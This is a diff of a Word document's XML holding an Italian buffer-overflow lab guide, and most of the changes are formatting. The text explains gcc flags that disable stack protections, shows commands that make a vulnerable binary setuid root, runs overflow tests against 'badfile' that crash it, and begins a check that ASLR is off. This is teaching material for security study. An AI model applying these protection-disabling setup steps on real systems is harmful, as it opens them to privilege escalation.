+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t xml:space="preserve">. Dato che anche il compilatore </w:t>
@@ -5424,7 +5466,7 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:i/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>gcc</w:t>
@@ -5432,6 +5474,7 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t xml:space="preserve"> prevede di default che gli </w:t>
@@ -5439,6 +5482,7 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>stacks</w:t>
@@ -5446,6 +5490,7 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t xml:space="preserve"> non siano eseguibili, questo parametro permette al programma vulnerabile compilato di eseguire codice all’interno dello </w:t>
@@ -5453,6 +5498,7 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>stack</w:t>
@@ -5460,6 +5506,7 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>.</w:t>
@@ -5470,30 +5517,25 @@
         <w:pStyle w:val="Standard"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="13"/>
+          <w:numId w:val="16"/>
         </w:numPr>
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>-m32:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Permette di compilare il codice utilizzato la versione 32-bit </w:t>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-m32: Permette di compilare il codice utilizzato la versione 32-bit </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:i/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>gcc</w:t>
@@ -5501,7 +5543,7 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:i/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>.</w:t>
@@ -5512,16 +5554,17 @@
         <w:pStyle w:val="Standard"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="13"/>
+          <w:numId w:val="16"/>
         </w:numPr>
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>-</w:t>
@@ -5529,7 +5572,7 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:b/>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>fno-stack-protector</w:t>
@@ -5537,20 +5580,15 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:b/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Di default all’interno dello </w:t>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: Di default all’interno dello </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>stack</w:t>
@@ -5558,6 +5596,7 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t xml:space="preserve"> sono anche aggiunti dei dati e controlli particolari per prevenire l’occorrenza di BO, questa contromisura è chiama </w:t>
@@ -5565,6 +5604,7 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>StackGuard</w:t>
@@ -5572,12 +5612,14 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>. Questo parametro permette di compilare il codice vulnerabile in questione senza questi controlli.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:br/>
@@ -5588,11 +5630,13 @@
         <w:pStyle w:val="Standard"/>
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>È necessario inoltre dare i permessi di root al file compilato dal programma vulnerabile.</w:t>
@@ -5638,11 +5682,13 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
               </w:rPr>
               <w:t xml:space="preserve">$ </w:t>
             </w:r>
@@ -5650,6 +5696,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
               </w:rPr>
               <w:t>sudo</w:t>
             </w:r>
@@ -5657,6 +5704,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
@@ -5664,6 +5712,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
               </w:rPr>
               <w:t>chown</w:t>
             </w:r>
@@ -5671,6 +5720,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
               </w:rPr>
               <w:t xml:space="preserve"> root stack </w:t>
             </w:r>
@@ -5687,6 +5737,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
               </w:rPr>
               <w:t xml:space="preserve">$ </w:t>
             </w:r>
@@ -5694,6 +5745,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
               </w:rPr>
               <w:t>sudo</w:t>
             </w:r>
@@ -5701,6 +5753,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
@@ -5708,6 +5761,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
               </w:rPr>
               <w:t>chmod</w:t>
             </w:r>
@@ -5715,6 +5769,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
               </w:rPr>
               <w:t xml:space="preserve"> 4755 stack</w:t>
             </w:r>
@@ -5806,35 +5861,71 @@
             <w:pPr>
               <w:pStyle w:val="Standard"/>
               <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
             </w:pPr>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
               <w:t>$ echo "</w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
               <w:t>aaaa</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
               <w:t xml:space="preserve">" &gt; </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
               <w:t>badfile</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
               <w:br/>
             </w:r>
             <w:proofErr w:type="gramStart"/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
               <w:t>$ .</w:t>
             </w:r>
             <w:proofErr w:type="gramEnd"/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
               <w:t xml:space="preserve">/stack </w:t>
             </w:r>
           </w:p>
@@ -5848,7 +5939,14 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Returned Properly </w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t>Returned Properly</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5890,6 +5988,268 @@
           <w:lang w:val="en-GB"/>
         </w:rPr>
         <w:t>valido</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="Grigliatabella"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9628"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="665"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9628" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="nil"/>
+              <w:left w:val="nil"/>
+              <w:bottom w:val="nil"/>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t>$ echo "</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t>aaa</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t>...(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t xml:space="preserve">100 characters omitted)... </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t>aaa</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t xml:space="preserve">" &gt; </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t>badfile</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:br/>
+              <w:t xml:space="preserve">$ ./stack </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:br/>
+              <w:t>Segmentation fault (core dumped)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">c) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Controllare che l’ASLR sia disabilitato</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Per assicurarsi che l’ASLR sia effettivamente disabilitato sulla macchina su cui si sta cercando di eseguire l’attacco, si può verificare andando ad eseguire il seguente script C:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ASLR </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Checker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>prog.c</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
@@ -5924,51 +6284,148 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">#include </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:br/>
+              <w:t xml:space="preserve">void </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>func</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">int* a1) </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:br/>
+              <w:t xml:space="preserve">{ </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:br/>
+              <w:t xml:space="preserve">        </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>printf</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(" :: a1’s address is 0x%x \n", (unsigned int) &amp;a1); </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:br/>
+              <w:t xml:space="preserve">} </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:br/>
+            </w:r>
